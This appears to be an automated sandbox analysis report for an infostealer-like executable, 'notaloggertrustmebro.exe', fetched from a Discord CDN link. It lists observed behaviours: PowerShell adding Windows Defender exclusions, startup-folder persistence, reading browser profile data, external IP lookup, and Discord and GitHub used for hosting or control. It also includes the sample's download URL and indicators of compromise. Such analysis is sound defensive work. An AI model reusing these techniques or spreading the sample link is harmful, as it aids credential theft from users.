Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
08/05/2024, 23:37
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1237910600949174314/1237910688165265408/notaloggertrustmebro.exe?ex=663d5dab&is=663c0c2b&hm=a504c550ad08bda5e8c4ee8e10454fc6da33d63ebfe478c1ead62c4a0c58df5b&
Resource
win10v2004-20240426-en
General
-
Target
https://cdn.discordapp.com/attachments/1237910600949174314/1237910688165265408/notaloggertrustmebro.exe?ex=663d5dab&is=663c0c2b&hm=a504c550ad08bda5e8c4ee8e10454fc6da33d63ebfe478c1ead62c4a0c58df5b&
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1056 powershell.exe 5056 powershell.exe 5024 powershell.exe 5164 powershell.exe 5480 powershell.exe 3028 powershell.exe 5368 powershell.exe 1548 powershell.exe 4804 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe notaloggertrustmebro.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe\:SmartScreen:$DATA notaloggertrustmebro.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe notaloggertrustmebro.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe\:SmartScreen:$DATA notaloggertrustmebro.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe notaloggertrustmebro.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe\:SmartScreen:$DATA notaloggertrustmebro.exe -
Executes dropped EXE 6 IoCs
pid Process 5508 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 3564 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 3708 notaloggertrustmebro.exe 1064 notaloggertrustmebro.exe -
Loads dropped DLL 64 IoCs
pid Process 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x00070000000234d2-181.dat upx behavioral1/memory/5956-184-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp upx behavioral1/memory/5956-194-0x00007FFEE9660000-0x00007FFEE966F000-memory.dmp upx behavioral1/files/0x00070000000234d0-203.dat upx behavioral1/files/0x00070000000234ac-211.dat upx behavioral1/files/0x00070000000234ab-210.dat upx behavioral1/memory/5956-222-0x00007FFEE88A0000-0x00007FFEE88AD000-memory.dmp upx behavioral1/files/0x00070000000234d5-225.dat upx behavioral1/files/0x00070000000234b0-227.dat upx behavioral1/files/0x00070000000234cb-231.dat upx behavioral1/memory/5956-233-0x00007FFED65F0000-0x00007FFED6B19000-memory.dmp upx behavioral1/memory/5956-238-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp upx behavioral1/memory/5956-237-0x00007FFED8DE0000-0x00007FFED8E05000-memory.dmp upx behavioral1/memory/5956-236-0x00007FFED8D10000-0x00007FFED8D43000-memory.dmp upx behavioral1/memory/5956-243-0x00007FFED8C00000-0x00007FFED8C12000-memory.dmp upx behavioral1/files/0x00070000000234b2-247.dat upx behavioral1/memory/5956-249-0x00007FFED6470000-0x00007FFED65EE000-memory.dmp upx behavioral1/memory/5956-250-0x00007FFED8BE0000-0x00007FFED8BF8000-memory.dmp upx behavioral1/memory/5956-254-0x00007FFED72D0000-0x00007FFED72F7000-memory.dmp upx behavioral1/memory/5956-257-0x00007FFED8D10000-0x00007FFED8D43000-memory.dmp upx behavioral1/memory/5956-262-0x00007FFED8670000-0x00007FFED867B000-memory.dmp upx behavioral1/memory/5956-268-0x00007FFED72A0000-0x00007FFED72AE000-memory.dmp upx behavioral1/memory/5956-280-0x00007FFED62F0000-0x00007FFED62FC000-memory.dmp upx behavioral1/memory/5956-281-0x00007FFED60A0000-0x00007FFED62E5000-memory.dmp upx behavioral1/memory/5956-279-0x00007FFED6300000-0x00007FFED6312000-memory.dmp upx behavioral1/memory/5956-282-0x00007FFED6060000-0x00007FFED6089000-memory.dmp upx behavioral1/memory/5956-283-0x00007FFED6030000-0x00007FFED605E000-memory.dmp upx behavioral1/memory/5956-278-0x00007FFED72D0000-0x00007FFED72F7000-memory.dmp upx behavioral1/memory/5956-277-0x00007FFED6320000-0x00007FFED632D000-memory.dmp upx behavioral1/memory/5956-276-0x00007FFED6330000-0x00007FFED633C000-memory.dmp upx behavioral1/memory/5956-275-0x00007FFED6340000-0x00007FFED634C000-memory.dmp upx behavioral1/memory/5956-274-0x00007FFED8BE0000-0x00007FFED8BF8000-memory.dmp upx behavioral1/memory/5956-269-0x00007FFED7290000-0x00007FFED729C000-memory.dmp upx behavioral1/memory/5956-273-0x00007FFED6470000-0x00007FFED65EE000-memory.dmp upx behavioral1/memory/5956-272-0x00007FFED7390000-0x00007FFED73B4000-memory.dmp upx behavioral1/memory/5956-271-0x00007FFED7270000-0x00007FFED727B000-memory.dmp upx behavioral1/memory/5956-270-0x00007FFED7280000-0x00007FFED728B000-memory.dmp upx behavioral1/memory/5956-267-0x00007FFED72B0000-0x00007FFED72BC000-memory.dmp upx behavioral1/memory/5956-266-0x00007FFED72C0000-0x00007FFED72CC000-memory.dmp upx behavioral1/memory/5956-265-0x00007FFED7D00000-0x00007FFED7D0B000-memory.dmp upx behavioral1/memory/5956-264-0x00007FFED8C00000-0x00007FFED8C12000-memory.dmp upx behavioral1/memory/5956-263-0x00007FFED80D0000-0x00007FFED80DC000-memory.dmp upx behavioral1/memory/5956-261-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp upx behavioral1/memory/5956-260-0x00007FFED93F0000-0x00007FFED93FC000-memory.dmp upx behavioral1/memory/5956-259-0x00007FFED9530000-0x00007FFED953B000-memory.dmp upx behavioral1/memory/5956-258-0x00007FFEE0E30000-0x00007FFEE0E3B000-memory.dmp upx behavioral1/memory/5956-256-0x00007FFED6350000-0x00007FFED646B000-memory.dmp upx behavioral1/memory/5956-255-0x00007FFED65F0000-0x00007FFED6B19000-memory.dmp upx behavioral1/memory/5956-253-0x00007FFEE36E0000-0x00007FFEE36EB000-memory.dmp upx behavioral1/memory/5956-252-0x00007FFED8D50000-0x00007FFED8D64000-memory.dmp upx behavioral1/memory/5956-251-0x00007FFED7300000-0x00007FFED7387000-memory.dmp upx behavioral1/memory/5956-248-0x00007FFED7390000-0x00007FFED73B4000-memory.dmp upx behavioral1/memory/5956-246-0x00007FFED80E0000-0x00007FFED8115000-memory.dmp upx behavioral1/memory/5956-245-0x00007FFEE88A0000-0x00007FFEE88AD000-memory.dmp upx behavioral1/memory/5956-242-0x00007FFED8D90000-0x00007FFED8DBD000-memory.dmp upx behavioral1/memory/5956-241-0x00007FFED8C20000-0x00007FFED8C36000-memory.dmp upx behavioral1/files/0x00070000000234af-240.dat upx behavioral1/files/0x00070000000234a7-239.dat upx behavioral1/files/0x00070000000234cd-235.dat upx behavioral1/files/0x00070000000234b3-234.dat upx behavioral1/memory/5956-232-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp upx behavioral1/memory/5956-230-0x00007FFED8D50000-0x00007FFED8D64000-memory.dmp upx behavioral1/memory/5956-228-0x00007FFEE5CB0000-0x00007FFEE5CBD000-memory.dmp upx behavioral1/memory/5956-226-0x00007FFEE6770000-0x00007FFEE677D000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
flow ioc 87 discord.com 105 discord.com 65 raw.githubusercontent.com 67 discord.com 68 discord.com 71 discord.com 72 discord.com 86 discord.com 89 raw.githubusercontent.com 103 discord.com 106 discord.com 64 raw.githubusercontent.com 79 raw.githubusercontent.com 84 discord.com -
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 104 api.ipify.org 61 api.ipify.org 62 api.ipify.org 70 api.ipify.org 77 api.ipify.org 85 api.ipify.org 88 api.ipify.org -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000a000000023418-41.dat pyinstaller -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2932 WMIC.exe 6040 WMIC.exe 1648 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 904369.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3952 msedge.exe 3952 msedge.exe 3988 msedge.exe 3988 msedge.exe 3244 identity_helper.exe 3244 identity_helper.exe 2732 msedge.exe 2732 msedge.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5748 powershell.exe 5748 powershell.exe 5748 powershell.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 5956 notaloggertrustmebro.exe 6036 powershell.exe 6036 powershell.exe 6036 powershell.exe 1056 powershell.exe 1056 powershell.exe 1056 powershell.exe 5056 powershell.exe 5056 powershell.exe 5056 powershell.exe 5368 powershell.exe 5368 powershell.exe 5368 powershell.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 5644 powershell.exe 5644 powershell.exe 5644 powershell.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 376 notaloggertrustmebro.exe 2300 powershell.exe 2300 powershell.exe 2300 powershell.exe 5024 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5956 notaloggertrustmebro.exe Token: SeIncreaseQuotaPrivilege 5416 WMIC.exe Token: SeSecurityPrivilege 5416 WMIC.exe Token: SeTakeOwnershipPrivilege 5416 WMIC.exe Token: SeLoadDriverPrivilege 5416 WMIC.exe Token: SeSystemProfilePrivilege 5416 WMIC.exe Token: SeSystemtimePrivilege 5416 WMIC.exe Token: SeProfSingleProcessPrivilege 5416 WMIC.exe Token: SeIncBasePriorityPrivilege 5416 WMIC.exe Token: SeCreatePagefilePrivilege 5416 WMIC.exe Token: SeBackupPrivilege 5416 WMIC.exe Token: SeRestorePrivilege 5416 WMIC.exe Token: SeShutdownPrivilege 5416 WMIC.exe Token: SeDebugPrivilege 5416 WMIC.exe Token: SeSystemEnvironmentPrivilege 5416 WMIC.exe Token: SeRemoteShutdownPrivilege 5416 WMIC.exe Token: SeUndockPrivilege 5416 WMIC.exe Token: SeManageVolumePrivilege 5416 WMIC.exe Token: 33 5416 WMIC.exe Token: 34 5416 WMIC.exe Token: 35 5416 WMIC.exe Token: 36 5416 WMIC.exe Token: SeIncreaseQuotaPrivilege 5416 WMIC.exe Token: SeSecurityPrivilege 5416 WMIC.exe Token: SeTakeOwnershipPrivilege 5416 WMIC.exe Token: SeLoadDriverPrivilege 5416 WMIC.exe Token: SeSystemProfilePrivilege 5416 WMIC.exe Token: SeSystemtimePrivilege 5416 WMIC.exe Token: SeProfSingleProcessPrivilege 5416 WMIC.exe Token: SeIncBasePriorityPrivilege 5416 WMIC.exe Token: SeCreatePagefilePrivilege 5416 WMIC.exe Token: SeBackupPrivilege 5416 WMIC.exe Token: SeRestorePrivilege 5416 WMIC.exe Token: SeShutdownPrivilege 5416 WMIC.exe Token: SeDebugPrivilege 5416 WMIC.exe Token: SeSystemEnvironmentPrivilege 5416 WMIC.exe Token: SeRemoteShutdownPrivilege 5416 WMIC.exe Token: SeUndockPrivilege 5416 WMIC.exe Token: SeManageVolumePrivilege 5416 WMIC.exe Token: 33 5416 WMIC.exe Token: 34 5416 WMIC.exe Token: 35 5416 WMIC.exe Token: 36 5416 WMIC.exe Token: SeDebugPrivilege 5748 powershell.exe Token: SeDebugPrivilege 6036 powershell.exe Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 5056 powershell.exe Token: SeDebugPrivilege 5368 powershell.exe Token: SeIncreaseQuotaPrivilege 2188 WMIC.exe Token: SeSecurityPrivilege 2188 WMIC.exe Token: SeTakeOwnershipPrivilege 2188 WMIC.exe Token: SeLoadDriverPrivilege 2188 WMIC.exe Token: SeSystemProfilePrivilege 2188 WMIC.exe Token: SeSystemtimePrivilege 2188 WMIC.exe Token: SeProfSingleProcessPrivilege 2188 WMIC.exe Token: SeIncBasePriorityPrivilege 2188 WMIC.exe Token: SeCreatePagefilePrivilege 2188 WMIC.exe Token: SeBackupPrivilege 2188 WMIC.exe Token: SeRestorePrivilege 2188 WMIC.exe Token: SeShutdownPrivilege 2188 WMIC.exe Token: SeDebugPrivilege 2188 WMIC.exe Token: SeSystemEnvironmentPrivilege 2188 WMIC.exe Token: SeRemoteShutdownPrivilege 2188 WMIC.exe Token: SeUndockPrivilege 2188 WMIC.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3988 wrote to memory of 1104 3988 msedge.exe 84 PID 3988 wrote to memory of 1104 3988 msedge.exe 84 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3060 3988 msedge.exe 85 PID 3988 wrote to memory of 3952 3988 msedge.exe 86 PID 3988 wrote to memory of 3952 3988 msedge.exe 86 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87 PID 3988 wrote to memory of 2640 3988 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1237910600949174314/1237910688165265408/notaloggertrustmebro.exe?ex=663d5dab&is=663c0c2b&hm=a504c550ad08bda5e8c4ee8e10454fc6da33d63ebfe478c1ead62c4a0c58df5b&1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee9a746f8,0x7ffee9a74708,0x7ffee9a747182⤵PID:1104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:22⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:82⤵PID:2640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:12⤵PID:2228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:3928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:82⤵PID:2664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4672 /prefetch:82⤵PID:2312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:12⤵PID:4316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5948 /prefetch:82⤵PID:1676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:12⤵PID:3176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:12⤵PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵PID:860
-
-
